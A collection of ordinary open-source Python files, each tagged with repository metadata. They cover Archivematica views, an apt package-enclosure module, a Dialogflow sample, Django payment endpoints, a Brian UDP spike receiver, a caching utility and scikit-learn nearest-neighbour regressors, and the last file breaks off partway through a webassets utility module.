def execute(request):
result = ''
if 'uuid' in request.REQUEST:
client = MCPClient()
uuid = request.REQUEST.get('uuid', '')
choice = request.REQUEST.get('choice', '')
uid = request.REQUEST.get('uid', '')
result = client.execute(uuid, choice, uid)
return HttpResponse(result, mimetype = 'text/plain')
def list(request):
client = MCPClient()
jobs = etree.XML(client.list())
response = ''
if 0 < len(jobs):
for job in jobs:
response += etree.tostring(job)
response = '<MCP>%s</MCP>' % response
return HttpResponse(response, mimetype = 'text/xml')
| michal-ruzicka/archivematica | src/dashboard/src/components/mcp/views.py | Python | agpl-3.0 | 1,507 | 0.005309 |
# Copyright (C) Anton Liaukevich 2011-2020 <leva.dev@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
'''Package "enclosure" structure description and processing'''
from lxml import etree
from .errors import *
class EveryError(Error): pass
class EveryAndDistinctError(EveryError): pass
class VersionsEveryAndDistinctError(EveryAndDistinctError): pass
class ArchAndVersionsEveryAndDistinctError(EveryAndDistinctError): pass
class CannonEnumerateEvery(EveryError): pass
class CannotAddExistingPackage(Error): pass
class EnclosureImportSyntaxError(XmlImportSyntaxError):
'''Syntax or semantic error while enclosure structure parsing'''
class Versions:
def __init__(self, isevery=False):
self.__isevery = isevery
self.__items = set()
@property
def isevery(self):
return self.__isevery
def __iter__(self):
if self.isevery:
raise CannonEnumerateEvery("Cannot enumerate every possible versions")
return iter(self.__items)
def __contains__(self, version):
return self.isevery or version in self.__items
def add(self, version):
if self.isevery:
raise VersionsEveryAndDistinctError("You must not add distinct versions where every added")
self.__items.add(version)
class ArchAndVersions:
def __init__(self, isevery=False):
self.__every = Versions() if isevery else None
self.__data = {}
@property
def isevery(self):
return self.__every is not None
@property
def every(self):
return self.__every
@every.setter
def every(self, value):
self.__every = value
def __iter__(self):
if self.isevery:
raise CannonEnumerateEvery("Cannot enumerate every possible architectures and versions")
return iter(self.__data.items())
def has_arch_version(self, arch, version):
if self.isevery:
return version in self.every
else:
#TODO: Is it right?
try:
return version in self.__data[arch]
except KeyError:
try:
return version in self.__data["all"]
except KeyError:
return False
def add(self, versions, arch=None):
if self.every:
assert arch is None
self.every = versions
else:
assert arch is not None
self.__data[arch] = versions
def add_single(self, version, arch=None):
if self.every:
assert arch is None
self.every.add(version)
else:
assert arch is not None
try:
self.__data[arch].add(version)
except KeyError:
versions = Versions()
versions.add(version)
self.__data[arch] = versions
class Enclosure:
def __init__(self):
self.__packages = {}
def __iter__(self):
return iter(self.__packages)
def __contains__(self, package):
try:
return self.__packages[package.name].has_arch_version(package.architecture, package.version)
except KeyError:
return False
def clear(self):
self.__packages.clear()
def add_package(self, name, arch_and_versions):
if name in self.__packages:
raise CannotAddExistingPackage("Package '{0}' is already in the eclosure".format(name))
self.__packages[name] = arch_and_versions
def add_versioned_package(self, versioned):
try:
self.__packages[versioned.name].add_single(versioned.version, versioned.architecture)
except KeyError:
arch_and_versions = ArchAndVersions()
arch_and_versions.add_single(versioned.version, versioned.architecture)
self.__packages[versioned.name] = arch_and_versions
def export_to_xml(self, file):
root = etree.Element("enclosure")
for pkg, arch_and_versions in sorted(self.__packages.items(), key=lambda x: x[0]):
if arch_and_versions.isevery and arch_and_versions.every.isevery:
etree.SubElement(root, "fullpackage", name=pkg)
else:
package_element = etree.SubElement(root, "package", name=pkg)
if arch_and_versions.isevery:
everyarch_element = etree.SubElement(package_element, "everyarch")
for version in sorted(arch_and_versions.every):
etree.SubElement(everyarch_element, "version", number=version)
else:
for arch, versions in sorted(arch_and_versions, key=lambda x: x[0]):
arch_element = etree.SubElement(package_element, "arch", name=arch)
if versions.isevery:
etree.SubElement(arch_element, "everyversion")
else:
for version in sorted(versions):
etree.SubElement(arch_element, "version", number=version)
tree = etree.ElementTree(root)
tree.write(file, pretty_print=True, encoding="UTF-8", xml_declaration=True)
def import_from_xml(self, file):
try:
root = etree.parse(file).getroot()
self.clear()
for fullpackage_element in root.findall("fullpackage"):
arch_and_versions = ArchAndVersions(isevery=True)
arch_and_versions.every = Versions(isevery=True)
self.add_package(fullpackage_element.get("name"), arch_and_versions)
for package_element in root.findall("package"):
everyarch_element = package_element.find("everyarch")
if everyarch_element is not None:
arch_and_versions = ArchAndVersions(isevery=True)
everyversion_element = everyarch_element.find("everyversion")
if everyversion_element is not None:
arch_and_versions.every = Versions(isevery=True)
else:
versions = Versions()
for version_element in everyarch_element.findall("version"):
versions.add(version_element.get("number"))
arch_and_versions.add(versions)
else:
arch_and_versions = ArchAndVersions()
for arch_element in package_element.findall("arch"):
everyversion_element = arch_element.find("everyversion")
if everyversion_element is not None:
arch_and_versions.add(Versions(isevery=True), arch_element.get("name"))
else:
versions = Versions()
for version_element in arch_element.findall("version"):
versions.add(version_element.get("number"))
arch_and_versions.add(versions, arch_element.get("name"))
self.add_package(package_element.get("name"), arch_and_versions)
except (ValueError, LookupError, etree.XMLSyntaxError) as err:
raise EnclosureImportSyntaxError('''Syntax error has been appeared during importing
enclosure structure from xml: ''' + str(err))
class MixedEnclosure:
def __init__(self, *enclosures):
self.enclosures = [enclosure for enclosure in enclosures]
def __contains__(self, package):
for enclosure in self.enclosures:
if package in enclosure:
return True
return False
| saintleva/limited-apt | src/limitedapt/enclosure.py | Python | gpl-3.0 | 8,559 | 0.008062 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteConversationDataset
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_v2_generated_ConversationDatasets_DeleteConversationDataset_sync]
from google.cloud import dialogflow_v2
def sample_delete_conversation_dataset():
# Create a client
client = dialogflow_v2.ConversationDatasetsClient()
# Initialize request argument(s)
request = dialogflow_v2.DeleteConversationDatasetRequest(
name="name_value",
)
# Make the request
operation = client.delete_conversation_dataset(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END dialogflow_v2_generated_ConversationDatasets_DeleteConversationDataset_sync]
| googleapis/python-dialogflow | samples/generated_samples/dialogflow_v2_generated_conversation_datasets_delete_conversation_dataset_sync.py | Python | apache-2.0 | 1,640 | 0.001829 |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
import EasyDialogs
valid_responses = { 1:'yes',
0:'no',
-1:'cancel',
}
response = EasyDialogs.AskYesNoCancel('Select an option')
print 'You selected:', valid_responses[response]
| qilicun/python | python2/PyMOTW-1.132/PyMOTW/EasyDialogs/EasyDialogs_AskYesNoCancel.py | Python | gpl-3.0 | 390 | 0.012821 |
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets, mixins
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from rest_framework.decorators import api_view, permission_classes
from apps.payments.models import Installment, RentalPaymentInfo
from apps.markets.models import Market
from apps.booths.models import Booth
from apps.payments.serializers import InstallmentSerializer, UploadReceiptSerializer, VerifyReceiptSerializer
class PaymentViewSet(viewsets.GenericViewSet, mixins.CreateModelMixin):
"""
### Pay with bank account
{\n
"payment_type": 1,
"market": 1,
"payment_method": 2,
"amount": 2000
}
### Pay with credit card
{\n
"payment_type": 1,
"market": 1,
"payment_method": 1,
"amount": 2000,
"credit_card": 1
}
### Pay with new credit card
{\n
"payment_type": 1,
"market": 1,
"new_credit_card": {
"card_number": "123456789",
"card_holder_name": "Bee",
"type": 1,
"expiry_date": "2020-07-01",
"verification_no": "123"
},
"save_new_credit_card": true,
"payment_method": 1,
"amount": 2000
}
"""
queryset = Installment.objects.all()
serializer_class = InstallmentSerializer
permission_classes = (IsAuthenticated,)
class UploadReceiptViewSet(viewsets.GenericViewSet, mixins.RetrieveModelMixin, mixins.UpdateModelMixin):
queryset = Installment.objects.all()
serializer_class = UploadReceiptSerializer
permission_classes = (IsAuthenticated,)
class VerifyReceiptViewSet(viewsets.GenericViewSet, mixins.ListModelMixin, mixins.RetrieveModelMixin,
mixins.UpdateModelMixin):
queryset = Installment.objects.filter(payment_method=Installment.BANK_TRANSFER,
verification_status=Installment.PENDING)
serializer_class = VerifyReceiptSerializer
permission_classes = (IsAuthenticated, IsAdminUser)
@api_view(['GET', ])
@permission_classes((IsAuthenticated, ))
def get_payment_status(request, *args, **kwargs):
market_id = kwargs.get('pk', None)
market = Market.objects.filter(pk=market_id)
if len(market) == 0:
return Response('Market does not exist', status=status.HTTP_400_BAD_REQUEST)
booths = Booth.objects.filter(market=market)
response = []
for booth in booths:
payment_info = dict()
payment_info['booth_id'] = booth.pk
payment_info['booth_number'] = booth.booth_number
approved_reservations = booth.approved_reservations.all()
if len(approved_reservations) != 0:
approved_reservation = approved_reservations[0]
try:
rental_payment_info = approved_reservation.rental_payment_info
payment_info['payment_status'] = rental_payment_info.status
payment_info['vendor_id'] = rental_payment_info.user.id
payment_info['vendor_name'] = rental_payment_info.user.first_name + ' ' + rental_payment_info.user.last_name
except:
payment_info['payment_status'] = 0
payment_info['vendor_id'] = approved_reservation.user.id
payment_info['vendor_name'] = approved_reservation.user.first_name + ' ' + approved_reservation.user.last_name
response.append(payment_info)
return Response(response, status=status.HTTP_200_OK)
| we-inc/mms-snow-white-and-the-seven-pandas | webserver/apps/payments/views.py | Python | mit | 3,518 | 0.002558 |
'''
Example of a spike receiver (only receives spikes)
In this example spikes are received and processed creating a raster plot at the end of the simulation.
'''
from brian import *
import numpy
from brian_multiprocess_udp import BrianConnectUDP
# The main function with the NeuronGroup(s) and Synapse(s) must be named "main_NeuronGroup".
# It will receive two objects: input_Neuron_Group and the simulation_clock. The input_Neuron_Group
# will supply the input spikes to the network. The size of the spike train received equals NumOfNeuronsInput.
# The size of the output spike train equals NumOfNeuronsOutput and must be the same size of the NeuronGroup who is
# going to interface with the rest of the system to send spikes.
# The function must return all the NeuronGroup objects and all the Synapse objects this way:
# ([list of all NeuronGroups],[list of all Synapses])
# and the FIRST (index 0) NeuronGroup of the list MUST be the one where the OUTPUT spikes will be taken by the simulation.
#
# Here is also possible to use "dummy" NeuronGroups only to receive and/or send spikes.
my_neuron_input_number = 100
def main_NeuronGroup(input_Neuron_Group, simulation_clock):
print "main_NeuronGroup!" #DEBUG!
simclock = simulation_clock
Nr=NeuronGroup(my_neuron_input_number, model='v:1', reset=0, threshold=0.5, clock=simclock)
Nr.v=0
# SYNAPSES BETWEEN REAL NEURON NETWORK AND THE INPUT
Syn_iNG_Nr=Synapses(input_Neuron_Group, Nr, model='w:1', pre='v+=w', clock=simclock)
Syn_iNG_Nr[:,:]='i==j'
print "Total Number of Synapses:", len(Syn_iNG_Nr) #DEBUG!
Syn_iNG_Nr.w=1
MExt=SpikeMonitor(Nr) # Spikes sent by UDP
Mdummy=SpikeMonitor(input_Neuron_Group) # Spikes received by UDP
return ([Nr],[Syn_iNG_Nr],[MExt,Mdummy])
def post_simulation_function(input_NG, simulation_NG, simulation_SYN, simulation_MN):
"""
input_NG: the neuron group that receives the input spikes
simulation_NG: the neuron groups list passed to the system by the user function (main_NeuronGroup)
simulation_SYN: the synapses list passed to the system by the user function (main_NeuronGroup)
simulation_MN: the monitors list passed to the system by the user function (main_NeuronGroup)
This way it is possible to plot, save or do whatever you want with these objects after the end of the simulation!
"""
pass
figure()
raster_plot(simulation_MN[1])
title("Spikes Received by UDP")
show(block=True)
# savefig('output.pdf')
if __name__=="__main__":
my_simulation = BrianConnectUDP(main_NeuronGroup, NumOfNeuronsInput=my_neuron_input_number, post_simulation_function=post_simulation_function,
input_addresses=[("127.0.0.1", 18181, my_neuron_input_number)], simclock_dt=1, inputclock_dt=2, TotalSimulationTime=10000, sim_repetitions=0, brian_address=2)
| ricardodeazambuja/BrianConnectUDP | examples/OutputNeuronGroup_brian.py | Python | cc0-1.0 | 2,857 | 0.014351 |
# coding:utf-8
'''
Market data update functionality
'''
from __future__ import print_function
from datetime import datetime, timedelta
from symbols import Symbols
import yahoo
def update_marketdata(from_date=None, to_date=None, sym=Symbols()):
'''
Fetch latest market data and upate it in db
'''
for s in sym.symbols():
if not from_date:
from_date = datetime.now() - timedelta(days=10*365) # fetch market data for 10 years
if not to_date:
to_date = datetime.now() + timedelta(days=2) # use a future date since there might be issues with timezones
date = sym.last_date(s)
fdate = date + timedelta(days=1) if date is not None else from_date
(res, data) = yahoo.fetch_market_data(s, fdate, to_date)
if res:
sym.insert_historical_prices(s, [(x[0], x[1], x[2], x[3], x[4], x[5], x[6]) for x in data])
else:
# There are several reasons update can fail: 1. No new data; 2. wrong symbol; 3. Other reason.
print('Failed updating symbol %s' % s)
| dp0h/marketdata | marketdata/update.py | Python | mit | 1,099 | 0.00364 |
from __future__ import annotations
import abc
import shutil
import functools
from pathlib import Path
import urllib.parse
from typing import (
Callable, Any, TypeVar, cast, Tuple, Dict, Optional,
Union, Hashable,
)
import logging
from edgar_code.types import PathLike, Serializer, UserDict
from edgar_code.util.picklable_threading import RLock
logger = logging.getLogger(__name__)
CacheKey = TypeVar('CacheKey')
CacheReturn = TypeVar('CacheReturn')
CacheFunc = TypeVar('CacheFunc', bound=Callable[..., Any])
class Cache:
@classmethod
def decor(
cls,
obj_store: Callable[[str], ObjectStore[CacheKey, CacheReturn]],
hit_msg: bool = False, miss_msg: bool = False, suffix: str = '',
) -> Callable[[CacheFunc], CacheFunc]:
'''Decorator that creates a cached function
>>> @Cache.decor(ObjectStore())
>>> def foo():
... pass
'''
def decor_(function: CacheFunc) -> CacheFunc:
return cast(
CacheFunc,
functools.wraps(function)(
cls(obj_store, function, hit_msg, miss_msg, suffix)
)
)
return decor_
disabled: bool
#pylint: disable=too-many-arguments
def __init__(
self,
obj_store: Callable[[str], ObjectStore[CacheKey, CacheReturn]],
function: CacheFunc,
hit_msg: bool = False, miss_msg: bool = False, suffix: str = ''
) -> None:
'''Cache a function.
Note this uses `function.__qualname__` to determine the file
name. If this is not unique within your program, define
suffix.
Note this uses `function.version` when defined, so objects of
the same functions of different versions will not collide.
'''
self.function = function
self.name = '-'.join(filter(bool, [
self.function.__qualname__,
suffix,
getattr(self.function, 'version', ''),
]))
self.obj_store = obj_store(self.name)
self.hit_msg = hit_msg
self.miss_msg = miss_msg
self.sem = RLock()
self.__qualname__ = f'Cache({self.name})'
self.disabled = False
def __call__(self, *pos_args: Any, **kwargs: Any) -> Any:
if self.disabled:
return self.function(*pos_args, **kwargs)
else:
with self.sem:
args_key = self.obj_store.args2key(pos_args, kwargs)
if args_key in self.obj_store:
if self.hit_msg:
logger.info('hit %s with %s, %s',
self.name, pos_args, kwargs)
res = self.obj_store[args_key]
else:
if self.miss_msg:
logger.info('miss %s with %s, %s',
self.name, pos_args, kwargs)
res = self.function(*pos_args, **kwargs)
self.obj_store[args_key] = res
return res
def clear(self) -> None:
'''Removes all cached items'''
self.obj_store.clear()
def __str__(self) -> str:
store_type = type(self.obj_store).__name__
return f'Cache of {self.name} with {store_type}'
ObjectStoreKey = TypeVar('ObjectStoreKey')
ObjectStoreValue = TypeVar('ObjectStoreValue')
class ObjectStore(UserDict[ObjectStoreKey, ObjectStoreValue], abc.ABC):
@classmethod
def create(
cls, *args: Any, **kwargs: Any
) -> Callable[[str], ObjectStore[ObjectStoreKey, ObjectStoreValue]]:
'''Curried init. Name will be applied later.'''
@functools.wraps(cls)
def create_(name: str) -> ObjectStore[ObjectStoreKey, ObjectStoreValue]:
return cls(*args, name=name, **kwargs) # type: ignore
return create_
def __init__(self, name: str) -> None:
super().__init__()
self.name = name
@abc.abstractmethod
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> ObjectStoreKey:
# pylint: disable=unused-argument,no-self-use
...
class MemoryStore(ObjectStore[Hashable, Any]):
def __init__(self, name: str):
# pylint: disable=non-parent-init-called
ObjectStore.__init__(self, name)
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> Hashable:
# pylint: disable=no-self-use
return to_hashable((args, kwargs))
class FileStore(MemoryStore):
'''An obj_store that persists at ./${CACHE_PATH}/${FUNCTION_NAME}_cache.pickle'''
def __init__(
self, cache_path: PathLike, name: str, serializer: Optional[Serializer] = None,
):
# pylint: disable=non-parent-init-called,super-init-not-called
ObjectStore.__init__(self, name)
if serializer is None:
import pickle
self.serializer = cast(Serializer, pickle)
else:
self.serializer = serializer
self.cache_path = pathify(cache_path) / (self.name + '_cache.pickle')
self.loaded = False
self.data = {}
def load_if_not_loaded(self) -> None:
if not self.loaded:
self.loaded = True
if self.cache_path.exists():
with self.cache_path.open('rb') as fil:
self.data = self.serializer.load(fil)
else:
self.cache_path.parent.mkdir(parents=True, exist_ok=True)
self.data = {}
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> Hashable:
# pylint: disable=no-self-use
return to_hashable((args, kwargs))
def commit(self) -> None:
self.load_if_not_loaded()
if self.data:
with self.cache_path.open('wb') as fil:
self.serializer.dump(self.data, fil)
else:
if self.cache_path.exists():
print('deleting ', self.cache_path)
self.cache_path.unlink()
def __setitem__(self, key: Hashable, obj: Any) -> None:
self.load_if_not_loaded()
super().__setitem__(key, obj)
self.commit()
def __delitem__(self, key: Hashable) -> None:
self.load_if_not_loaded()
super().__delitem__(key)
self.commit()
def clear(self) -> None:
self.load_if_not_loaded()
super().clear()
self.commit()
class DirectoryStore(ObjectStore[PathLike, Any]):
'''Stores objects at ./${CACHE_PATH}/${FUNCTION_NAME}/${urlencode(args)}.pickle'''
def __init__(
self, object_path: PathLike, name: str,
serializer: Optional[Serializer] = None
) -> None:
# pylint: disable=non-parent-init-called
ObjectStore.__init__(self, name)
if serializer is None:
import pickle
self.serializer = cast(Serializer, pickle)
else:
self.serializer = serializer
self.cache_path = pathify(object_path) / self.name
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> PathLike:
if kwargs:
args = args + (kwargs,)
fname = urllib.parse.quote(f'{safe_str(args)}.pickle', safe='')
return self.cache_path / fname
def __setitem__(self, path: PathLike, obj: Any) -> None:
path.parent.mkdir(parents=True, exist_ok=True)
with path.open('wb') as fil:
self.serializer.dump(obj, fil)
def __delitem__(self, path: PathLike) -> None:
path.unlink()
def __getitem__(self, path: PathLike) -> Any:
with path.open('rb') as fil:
return self.serializer.load(fil)
def __contains__(self, path: Any) -> bool:
if hasattr(path, 'exists'):
return bool(path.exists())
else:
return False
def clear(self) -> None:
print('deleting')
if hasattr(self.cache_path, 'rmtree'):
cast(Any, self.cache_path).rmtree()
else:
shutil.rmtree(str(self.cache_path))
def to_hashable(obj: Any) -> Hashable:
'''Converts args and kwargs into a hashable type (overridable)'''
try:
hash(obj)
except TypeError:
if hasattr(obj, 'items'):
# turn dictionaries into frozenset((key, val))
# sorting is necessary to make equal dictionaries map to equal things
# sorted(..., key=hash)
return tuple(sorted(
[(keyf, to_hashable(val)) for keyf, val in obj.items()],
key=hash
))
elif hasattr(obj, '__iter__'):
# turn iterables into tuples
return tuple(to_hashable(val) for val in obj)
else:
raise TypeError(f"I don't know how to hash {obj} ({type(obj)})")
else:
return cast(Hashable, obj)
def safe_str(obj: Any) -> str:
'''
Safe names are compact, unique, urlsafe, and equal when the objects are equal
str does not work because x == y does not imply str(x) == str(y).
>>> a = dict(d=1, e=1)
>>> b = dict(e=1, d=1)
>>> a == b
True
>>> str(a) == str(b)
False
>>> safe_str(a) == safe_str(b)
True
'''
if isinstance(obj, int):
ret = str(obj)
elif isinstance(obj, float):
ret = str(round(obj, 3))
elif isinstance(obj, str):
ret = repr(obj)
elif isinstance(obj, list):
ret = '[' + ','.join(map(safe_str, obj)) + ']'
elif isinstance(obj, tuple):
ret = '(' + ','.join(map(safe_str, obj)) + ')'
elif isinstance(obj, dict):
ret = '{' + ','.join(sorted(
safe_str(key) + ':' + safe_str(val)
for key, val in obj.items()
)) + '}'
else:
raise TypeError()
return urllib.parse.quote(ret, safe='')
def pathify(obj: Union[str, PathLike]) -> PathLike:
if isinstance(obj, str):
return Path(obj)
else:
return obj
| charmoniumQ/EDGAR-research | edgar_code/cache.py | Python | mit | 9,951 | 0.001306 |
from SerialBus import SerialBus
serialbus = SerialBus(baud = 19200, serialnum="ABCD")
while True:
cmd = input('Send: ')
answer = serialbus.send_request_wait(10, bytes(cmd, 'ascii'))
answer_str = "";
for char in answer:
answer_str += (chr(char))
print(answer_str)
| marplaa/SerialBus | python_lib/test_script/echo.py | Python | gpl-3.0 | 294 | 0.010204 |
"""Nearest Neighbor Regression"""
# Authors: Jake Vanderplas <vanderplas@astro.washington.edu>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Sparseness support by Lars Buitinck
# Multi-output support by Arnaud Joly <a.joly@ulg.ac.be>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import numpy as np
from .base import _get_weights, _check_weights, NeighborsBase, KNeighborsMixin
from .base import RadiusNeighborsMixin, SupervisedFloatMixin
from ..base import RegressorMixin
from ..utils import check_array
class KNeighborsRegressor(NeighborsBase, KNeighborsMixin,
SupervisedFloatMixin,
RegressorMixin):
"""Regression based on k-nearest neighbors.
The target is predicted by local interpolation of the targets
associated of the nearest neighbors in the training set.
Read more in the :ref:`User Guide <regression>`.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : integer, optional (default = 2)
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : string or callable, default 'minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of the DistanceMetric class for a
list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
n_jobs : int, optional (default = 1)
The number of parallel jobs to run for neighbors search.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Doesn't affect :meth:`fit` method.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import KNeighborsRegressor
>>> neigh = KNeighborsRegressor(n_neighbors=2)
>>> neigh.fit(X, y) # doctest: +ELLIPSIS
KNeighborsRegressor(...)
>>> print(neigh.predict([[1.5]]))
[ 0.5]
See also
--------
NearestNeighbors
RadiusNeighborsRegressor
KNeighborsClassifier
RadiusNeighborsClassifier
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances but
different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, n_neighbors=5, weights='uniform',
algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, n_jobs=1,
**kwargs):
self._init_params(n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params, n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
def predict(self, X):
"""Predict the target for the provided data
Parameters
----------
X : array-like, shape (n_query, n_features), \
or (n_query, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : array of int, shape = [n_samples] or [n_samples, n_outputs]
Target values
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
weights = _get_weights(neigh_dist, self.weights)
_y = self._y
if _y.ndim == 1:
_y = _y.reshape((-1, 1))
if weights is None:
y_pred = np.mean(_y[neigh_ind], axis=1)
else:
y_pred = np.empty((X.shape[0], _y.shape[1]), dtype=np.float64)
denom = np.sum(weights, axis=1)
for j in range(_y.shape[1]):
num = np.sum(_y[neigh_ind, j] * weights, axis=1)
y_pred[:, j] = num / denom
if self._y.ndim == 1:
y_pred = y_pred.ravel()
return y_pred
class RadiusNeighborsRegressor(NeighborsBase, RadiusNeighborsMixin,
SupervisedFloatMixin,
RegressorMixin):
"""Regression based on neighbors within a fixed radius.
The target is predicted by local interpolation of the targets
associated of the nearest neighbors in the training set.
Read more in the :ref:`User Guide <regression>`.
Parameters
----------
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : integer, optional (default = 2)
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : string or callable, default 'minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of the DistanceMetric class for a
list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import RadiusNeighborsRegressor
>>> neigh = RadiusNeighborsRegressor(radius=1.0)
>>> neigh.fit(X, y) # doctest: +ELLIPSIS
RadiusNeighborsRegressor(...)
>>> print(neigh.predict([[1.5]]))
[ 0.5]
See also
--------
NearestNeighbors
KNeighborsRegressor
KNeighborsClassifier
RadiusNeighborsClassifier
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, radius=1.0, weights='uniform',
algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, **kwargs):
self._init_params(radius=radius,
algorithm=algorithm,
leaf_size=leaf_size,
p=p, metric=metric, metric_params=metric_params,
**kwargs)
self.weights = _check_weights(weights)
def predict(self, X):
"""Predict the target for the provided data
Parameters
----------
X : array-like, shape (n_query, n_features), \
or (n_query, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : array of int, shape = [n_samples] or [n_samples, n_outputs]
Target values
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.radius_neighbors(X)
weights = _get_weights(neigh_dist, self.weights)
_y = self._y
if _y.ndim == 1:
_y = _y.reshape((-1, 1))
if weights is None:
y_pred = np.array([np.mean(_y[ind, :], axis=0)
for ind in neigh_ind])
else:
y_pred = np.array([(np.average(_y[ind, :], axis=0,
weights=weights[i]))
for (i, ind) in enumerate(neigh_ind)])
if self._y.ndim == 1:
y_pred = y_pred.ravel()
return y_pred
| mbayon/TFG-MachineLearning | venv/lib/python3.6/site-packages/sklearn/neighbors/regression.py | Python | mit | 10,967 | 0 |
from webassets import six
import contextlib
import os
import sys
from itertools import takewhile
from .exceptions import BundleError
__all__ = ('md5_constructor', 'pickle', 'set', 'StringIO',
'common_path_prefix', 'working_directory')
if sys.version_info >= (2, 5):
import hashlib
md5_constructor = hashlib.md5
else:
import md5
md5_constructor = md5.new
try:
import cPickle as pickle
except ImportError:
import pickle
try:
set
except NameError:
from sets import Set as set
else:
set = set
from webassets.six import StringIO
try:
from urllib import parse as urlparse
except ImportError: # Python 2
import urlparse
import urllib
def common_path_prefix(paths, sep=os.path.sep):
"""os.path.commonpath() is completely in the wrong place; it's
useless with paths since it only looks at one character at a time,
see http://bugs.python.org/issue10395
This replacement is from:
